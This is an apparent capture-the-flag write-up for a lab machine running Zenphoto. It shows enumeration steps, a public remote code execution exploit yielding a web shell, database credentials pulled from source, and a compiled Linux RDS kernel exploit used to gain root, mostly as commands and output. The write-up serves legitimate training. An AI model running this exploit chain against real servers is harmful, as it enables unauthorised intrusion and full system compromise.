Skip to main content

Zenphoto

Enumeration

  • Ran dirbuster with seclists/Discovery/Web-Content/Dirbuster...big.txt
  • found /test dir

  • Source code revealed the version and service

  • Searched for exploits

Exploitation

┌──(kali㉿hd)-[~/ctf/pvg/zenphoto]
└─$ php a.php $ip /test/

+-----------------------------------------------------------+
| Zenphoto <= 1.4.1.4 Remote Code Execution Exploit by EgiX |
+-----------------------------------------------------------+

zenphoto-shell# id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

  • Got stable shell from penelope
  • Enumerated source code, found db credentials root:hola, accessed db but no useful data was found
  • Ran linpeas for priv-esc enum

Privilege Escalation

www-data@offsecsrv:/tmp$ gcc exploit.c
www-data@offsecsrv:/tmp$ ./a.out
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved security_ops to 0xc08c8c2c
[+] Resolved default_security_ops to 0xc0773300
[+] Resolved cap_ptrace_traceme to 0xc02f3dc0
[+] Resolved commit_creds to 0xc016dcc0
[+] Resolved prepare_kernel_cred to 0xc016e000
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
# cat /root/root.txt
cat: /root/root.txt: No such file or directory
# cd /root
# cat proof.txt
<root_flag>